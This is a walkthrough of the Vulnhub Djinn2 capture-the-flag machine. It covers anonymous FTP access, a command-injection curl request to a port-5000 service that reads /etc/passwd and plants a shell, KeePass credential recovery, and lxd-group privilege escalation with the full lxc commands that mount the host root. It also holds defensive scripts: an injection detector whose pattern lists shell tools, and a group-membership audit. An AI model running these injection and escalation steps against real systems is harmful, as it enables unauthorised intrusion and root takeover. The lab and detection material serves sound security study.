Vulnhub – Djinn2 Walkthrough

We start by scanning the target with nmap -A -T4 -p- 192.168.1.17 -vv

The scan shows an FTP port that allows anonymous login; from it we can download three text files:

Cred.txt file: nitu:7846A$56

Game.txt file: @0xmzfr I would like to thank you for hiring me. I won’t disappoint you like SAM.

Also I’ve started implementing the secure way of authorizing the access to our network. I have provided @nitish81299 with the beta version of the key fob hopes everything would be good.

– @Ugtan_

Message.txt file: @nitish81299, you and Sam messed it all up. I’ve fired Sam for all the fuzz he created and this will be your last warning if you won’t put your shit together than you’ll be gone as well.

I’ve hired @Ugtan_ as our new security head, hope he’ll do something good.

– @0xmzfr

Running gobuster against port 7331 turns up two new paths, one of which is a text file, Source.txt:

Running the source file as a Python script does nothing except complain about a wrong IP address. After three days I found a PDF covering exactly this line, URL = http://{}:5000/?username={}&password={}, where we send a curl request to it to retrieve some information from the host (just google it):

curl -X POST http://192.168.1.2:5000/?username=id&password=

With this I was able to cat the /etc/passwd file and upload a shell to the tmp folder. I tried several types of shell, and the one that finally worked is the binary shellcode, saved as our shell file SHELL:

Then we upload the shellcode to the target machine and give it mode 777:
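From the defender's side, the request above is what a command-injection attempt through the username/password parameters looks like in a web server log. The following is an added example, not code from the walkthrough or from the Djinn2 box: it parses constructed Common Log Format lines for the port-5000 endpoint and flags query-string values that carry shell commands or metacharacters. The log lines, IP addresses and the token list are all assumptions made up for the example.

```python
"""Added example (not from the walkthrough): flag query-string values that look
like injected shell commands in access logs for a ?username=&password= endpoint.
All log lines below are constructed samples."""
import re
from urllib.parse import parse_qs, urlsplit

# Heuristic: a login form should never receive a bare command name, a shell
# metacharacter, or a reference to /etc/passwd or /tmp in a credential field.
SUSPICIOUS_TOKENS = re.compile(
    r"(?:^|[;&|`$(])\s*(?:id|whoami|cat|ls|wget|curl|chmod|sh|bash|nc|python)\b"
    r"|/etc/passwd|/tmp/|[;&|`]|\$\("
)

# Constructed sample lines in Common Log Format (client IP from TEST-NET-1).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2020:12:00:01 +0000] "POST /?username=nitish&password=Secret1 HTTP/1.1" 200 12
192.0.2.10 - - [10/Oct/2020:12:00:05 +0000] "POST /?username=id&password= HTTP/1.1" 200 40
192.0.2.10 - - [10/Oct/2020:12:00:09 +0000] "POST /?username=cat%20/etc/passwd&password= HTTP/1.1" 200 1500
192.0.2.10 - - [10/Oct/2020:12:00:12 +0000] "POST /?username=nitish&password=%3Bchmod%20777%20/tmp/shell HTTP/1.1" 200 12
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)


def flag_injection_attempts(log_text):
    """Return (timestamp, parameter name, decoded value) for every request whose
    query parameter value matches SUSPICIOUS_TOKENS. parse_qs percent-decodes
    each value once, so the regex sees the text the server would have seen."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        params = parse_qs(query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if SUSPICIOUS_TOKENS.search(value):
                    hits.append((m.group("ts"), name, value))
    return hits


if __name__ == "__main__":
    for ts, name, value in flag_injection_attempts(SAMPLE_LOG):
        print(f"{ts}  suspicious {name}={value!r}")
```

The first sample line is a normal login and is not reported; the other three are. The check is a log-side heuristic only; the real fix for an endpoint like this is never to hand request parameters to a shell in the first place.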

On our machine we start a meterpreter session:

After looking around for a while and running all the usual find commands, I found a file nitu.kdbx in the /var/backups folder. It is a KeePass database, which we can open on our machine using the credentials from cred.txt, nitu:7846A$56. First transfer the file with scp nitu.kdbx root@192.168.1.11:/root/, then search for keepass and install it:

In the terminal we type keepass2; a window will pop up where we browse for the file and enter the password 7846A$56. After that we right-click the entry and copy the password.

Now we go back to our shell and su nitish with the new password:

The user is a member of the lxd group, which we can exploit. We download the alpine builder from https://github.com/saghul/lxd-alpine-builder.git and follow its steps.

After that, copy the resulting image file to the target using wget.

Put these commands in order and you will get the root shell:

lxd init

It will ask us a few questions; keep them at their defaults.

lxc image import alpine-v3.3-x86_64-20160114_2308.tar.gz --alias myimage

lxc image list

lxc init myimage hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

Finally, the host's filesystem is mounted under /mnt/root, so its root directory is at /mnt/root/root, where we can run the proof.sh.
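The privilege escalation above works only because an ordinary account sits in the lxd group, which on a stock LXD install is as good as root. As an added example, not part of the walkthrough, here is a small audit that reads /etc/group and reports every account in a container-management group. The group-file text below is a constructed sample (the user names are assumptions borrowed from the box's story); pointing the same function at the real /etc/group gives the live result.

```python
"""Added example (not from the walkthrough): find accounts whose supplementary
groups grant root-equivalent container access (lxd, lxc, docker).
The sample group file is constructed; the user names are assumptions."""
import sys

# Membership in any of these groups lets a user start a privileged container
# with the host filesystem mounted inside, as the walkthrough does with lxd.
ROOT_EQUIVALENT_GROUPS = frozenset({"lxd", "lxc", "docker"})

# Constructed /etc/group excerpt; names are assumptions, not data from the box.
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:nitish
lxd:x:108:nitish,ugtan
docker:x:999:
users:x:100:sam
# comment lines and malformed lines are ignored
broken line
"""


def parse_group_file(text):
    """Map group name -> set of member user names (4th field of /etc/group)."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue
        name, _password, _gid, members = fields
        groups[name] = {m for m in members.split(",") if m}
    return groups


def root_equivalent_members(text, watch=ROOT_EQUIVALENT_GROUPS):
    """Return sorted (user, group) pairs for every user in a watched group."""
    groups = parse_group_file(text)
    findings = []
    for group in sorted(watch):
        for user in sorted(groups.get(group, ())):
            findings.append((user, group))
    return findings


def audit(path="/etc/group"):
    """Read a real group file and return its findings (empty list if clean)."""
    with open(path, encoding="utf-8") as fh:
        return root_equivalent_members(fh.read())


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    findings = audit(target) if target else root_equivalent_members(SAMPLE_GROUP_FILE)
    for user, group in findings:
        print(f"{user} is in group {group}: root-equivalent on this host")
    if not findings:
        print("no root-equivalent group members found")
```

On the sample data the audit reports nitish and ugtan for lxd and nothing for docker. The mitigation is simply to keep unprivileged accounts out of these groups; a user who needs containers should get them through an unprivileged daemon or through sudo rules that are actually reviewed.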
